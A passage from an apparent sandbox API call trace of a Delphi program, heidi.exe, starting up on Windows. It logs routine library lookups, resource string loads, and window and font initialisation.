lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0123.722] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x757f0000 [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VariantChangeTypeEx") returned 0x757f4c28 [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VarNeg") returned 0x7586c802 [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VarNot") returned 0x7586ec66 [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VarAdd") returned 0x75815934 [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VarSub") returned 0x7586d332 [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VarMul") returned 0x7586dbd4 [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VarDiv") returned 0x7586e405 [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VarIdiv") returned 0x7586f00a [0123.722] GetProcAddress (hModule=0x757f0000, lpProcName="VarMod") returned 0x7586f15e [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarAnd") returned 0x75815a98 [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarOr") returned 0x7586ecfa [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarXor") returned 0x7586ee2e [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarCmp") returned 0x7580b0dc [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarI4FromStr") returned 0x75806fab [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarR4FromStr") returned 0x758101a0 [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarR8FromStr") returned 0x7580699e [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarDateFromStr") returned 0x75816ba7 [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarCyFromStr") returned 0x75836c12 [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarBoolFromStr") returned 0x7580dbd1 [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarBstrFromCy") returned 0x75817fdc [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarBstrFromDate") returned 0x75807a2a [0123.723] GetProcAddress (hModule=0x757f0000, lpProcName="VarBstrFromBool") returned 0x75810355 [0123.724] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x80 [0123.724] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x84 [0123.724] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x88 [0123.724] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x75930000 [0123.724] GetDC (hWnd=0x0) returned 0x170106e8 [0123.724] GetDeviceCaps (hdc=0x170106e8, index=90) returned 96 [0123.724] ReleaseDC (hWnd=0x0, hDC=0x170106e8) returned 1 [0123.724] GetDC (hWnd=0x0) returned 0x170106e8 [0123.724] GetDeviceCaps (hdc=0x170106e8, index=104) returned 0 [0123.724] ReleaseDC (hWnd=0x0, hDC=0x170106e8) returned 1 [0123.724] CreatePalette (plpal=0x18fb30) returned 0x150808d3 [0123.725] GetStockObject (i=7) returned 0x1b00017 [0123.725] GetStockObject (i=5) returned 0x1900015 [0123.725] GetStockObject (i=13) returned 0x18a002e [0123.725] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0123.725] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff37, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff36, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff35, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff34, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0123.725] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0123.726] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e8 [0123.726] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f9 [0123.726] GetCurrentThreadId () returned 0xa40 [0123.726] GlobalAddAtomA (lpString="WndProcPtr0040000000000A40") returned 0xc148 [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xfef7, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xfef6, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xfef5, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xfef4, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xfef3, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xfef2, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xfef1, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0123.726] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0123.727] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0123.727] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1d0 [0123.727] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1d1 [0123.727] GetVersion () returned 0x1db10106 [0123.727] GetCurrentProcessId () returned 0xa3c [0123.727] GlobalAddAtomA (lpString="Delphi00000A3C") returned 0xc14b [0123.728] GetCurrentThreadId () returned 0xa40 [0123.728] GlobalAddAtomA (lpString="ControlOfs0040000000000A40") returned 0xc149 [0123.728] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000A40") returned 0xc1d2 [0123.728] GetProcAddress (hModule=0x75930000, lpProcName="GetMonitorInfoA") returned 0x75954413 [0123.728] GetProcAddress (hModule=0x75930000, lpProcName="GetSystemMetrics") returned 0x75947d2f [0123.728] GetSystemMetrics (nIndex=19) returned 1 [0123.733] GetSystemMetrics (nIndex=75) returned 1 [0123.733] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1cf1320, fWinIni=0x0 | out: pvParam=0x1cf1320) returned 1 [0123.733] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0123.733] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0123.733] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x4020f [0123.733] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0123.733] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0123.733] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0123.733] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x202b5 [0123.734] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0xc02af [0123.734] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x402ad [0123.734] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x202b3 [0123.734] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x50235 [0123.734] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x20245 [0123.734] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0123.734] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0123.734] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0123.734] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0123.734] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0123.734] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0123.734] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0123.734] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0123.735] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0123.735] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0123.735] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0123.735] GetDC (hWnd=0x0) returned 0x170106e8 [0123.735] GetDeviceCaps (hdc=0x170106e8, index=90) returned 96 [0123.735] ReleaseDC (hWnd=0x0, hDC=0x170106e8) returned 1 [0123.735] GetProcAddress (hModule=0x75930000, lpProcName="EnumDisplayMonitors") returned 0x7595451a [0123.735] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x458870, dwData=0x1cf156c) returned 1 [0123.735] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0123.735] CreateFontIndirectA (lplf=0x18fe97) returned 0x300a08e1 [0123.735] GetObjectA (in: h=0x300a08e1, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0123.735] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0123.736] CreateFontIndirectA (lplf=0x18fe1f) returned 0xc0a0975 [0123.736] GetObjectA (in: h=0xc0a0975, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0123.736] CreateFontIndirectA (lplf=0x18fde3) returned 0x370a088d [0123.736] GetObjectA (in: h=0x370a088d, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0123.736] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0 [0123.736] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe")) returned 0x2e [0123.736] OemToCharA (in: pSrc="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe") returned 1 [0123.736] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x1a0000 [0123.737] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0123.737] RegisterClassA (lpWndClass=0x474ecc) returned 0x43c1d4 [0123.737] GetSystemMetrics (nIndex=0) returned 1440 [0123.737] GetSystemMetrics (nIndex=1) returned 900 [0123.737] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="heidi", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20260 [0123.739] SetWindowLongA (hWnd=0x20260, nIndex=-4, dwNewLong=1708015) returned 4220976 [0123.740] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0123.740] SendMessageA (hWnd=0x20260, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0123.740] NtdllDefWindowProc_A (hWnd=0x20260, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0123.748] NtdllDefWindowProc_A (hWnd=0x20260, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x40209 [0123.750] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0123.750] SetClassLongA (hWnd=0x20260, nIndex=-14, dwNewLong=65575) returned 0x0 [0123.751] GetSystemMenu (hWnd=0x20260, bRevert=0) returned 0x20223 [0123.752] DeleteMenu (hMenu=0x20223, uPosition=0xf030, uFlags=0x0) returned 1 [0123.752] DeleteMenu (hMenu=0x20223, uPosition=0xf000, uFlags=0x0) returned 1 [0123.752] DeleteMenu (hMenu=0x20223, uPosition=0xf010, uFlags=0x0) returned 1 [0123.752] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0123.754] GetModuleHandleA (lpModuleName="USER32") returned 0x75930000 [0123.754] GetProcAddress (hModule=0x75930000, lpProcName="AnimateWindow") returned 0x7595b531 [0123.754] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x73af0000 [0123.754] GetProcAddress (hModule=0x73af0000, lpProcName="InitializeFlatSB") returned 0x73b2266f [0123.754] GetProcAddress (hModule=0x73af0000, lpProcName="UninitializeFlatSB") returned 0x73b22542 [0123.754] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_GetScrollProp") returned 0x73b21d29 [0123.754] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_SetScrollProp") returned 0x73b2238d [0123.754] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_EnableScrollBar") returned 0x73b220c9 [0123.755] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_ShowScrollBar") returned 0x73b21fdb [0123.755] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_GetScrollRange") returned 0x73b21e8d [0123.755] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_GetScrollInfo") returned 0x73b21f0f [0123.755] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_GetScrollPos") returned 0x73b21ccd [0123.755] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_SetScrollPos") returned 0x73b2216d [0123.755] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_SetScrollInfo") returned 0x73b222be [0123.755] GetProcAddress (hModule=0x73af0000, lpProcName="FlatSB_SetScrollRange") returned 0x73b221e2 [0123.755] GetModuleHandleA (lpModuleName="User32.dll") returned 0x75930000 [0123.755] GetProcAddress (hModule=0x75930000, lpProcName="SetLayeredWindowAttributes") returned 0x7596ec88 [0123.755] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc08b [0123.755] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75e10000 [0123.755] GetProcAddress (hModule=0x75e10000, lpProcName="CoCreateInstanceEx") returned 0x75e59d4e [0123.755] GetProcAddress (hModule=0x75e10000, lpProcName="CoInitializeEx") returned 0x75e509ad [0123.755] GetProcAddress (hModule=0x75e10000, lpProcName="CoAddRefServerProcess") returned 0x75e73cf3 [0123.755] GetProcAddress (hModule=0x75e10000, lpProcName="CoReleaseServerProcess") returned 0x75e74314 [0123.756] GetProcAddress (hModule=0x75e10000, lpProcName="CoResumeClassObjects") returned 0x75e1ea02 [0123.756] GetProcAddress (hModule=0x75e10000, lpProcName="CoSuspendClassObjects") returned 0x75e7bb02 [0123.756] LoadStringA (in: hInstance=0x400000, uID=0xff59, lpBuffer=0x18fad8, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9 [0123.756] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3 [0123.756] LoadStringA (in: hInstance=0x400000, uID=0xff5a, lpBuffer=0x18fad8, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12 [0123.756] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3 [0123.756] LoadStringA (in: hInstance=0x400000, uID=0xff5b, lpBuffer=0x18fad8, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5 [0123.756] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0123.756] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x18fad8, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7 [0123.756] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3 [0123.756] SetErrorMode (uMode=0x8000) returned 0x0 [0123.756] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x75270000 [0123.898] SetErrorMode (uMode=0x0) returned 0x8000 [0123.898] GetProcAddress (hModule=0x75270000, lpProcName="OleCreatePropertyFrame") returned 0x752720ea [0123.898] GetProcAddress (hModule=0x75270000, lpProcName="OleCreateFontIndirect") returned 0x752720b7 [0123.899] GetProcAddress (hModule=0x75270000, lpProcName="OleCreatePictureIndirect") returned 0x752720c8 [0123.899] GetProcAddress (hModule=0x75270000, lpProcName="OleLoadPicture") returned 0x752720d9 [0123.900] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x1cf20bc | out: lpBuffer="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\") returned 0x25 [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfedc, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="%s") returned 0x2 [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfedc, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="%s") returned 0x2 [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfedc, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="%s") returned 0x2 [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfedc, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="%s") returned 0x2 [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfedb, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Disconnected.") returned 0xd [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfeda, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Disconnecting.") returned 0xe [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfed9, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Connected.") returned 0xa [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfed8, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Connecting to %s.") returned 0x11 [0123.900] LoadStringA (in: hInstance=0x400000, uID=0xfed7, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Resolving hostname %s.") returned 0x16 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.900] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 [0123.901] GetWindowWord (hWnd=0x0, nIndex=0) returned 0x0 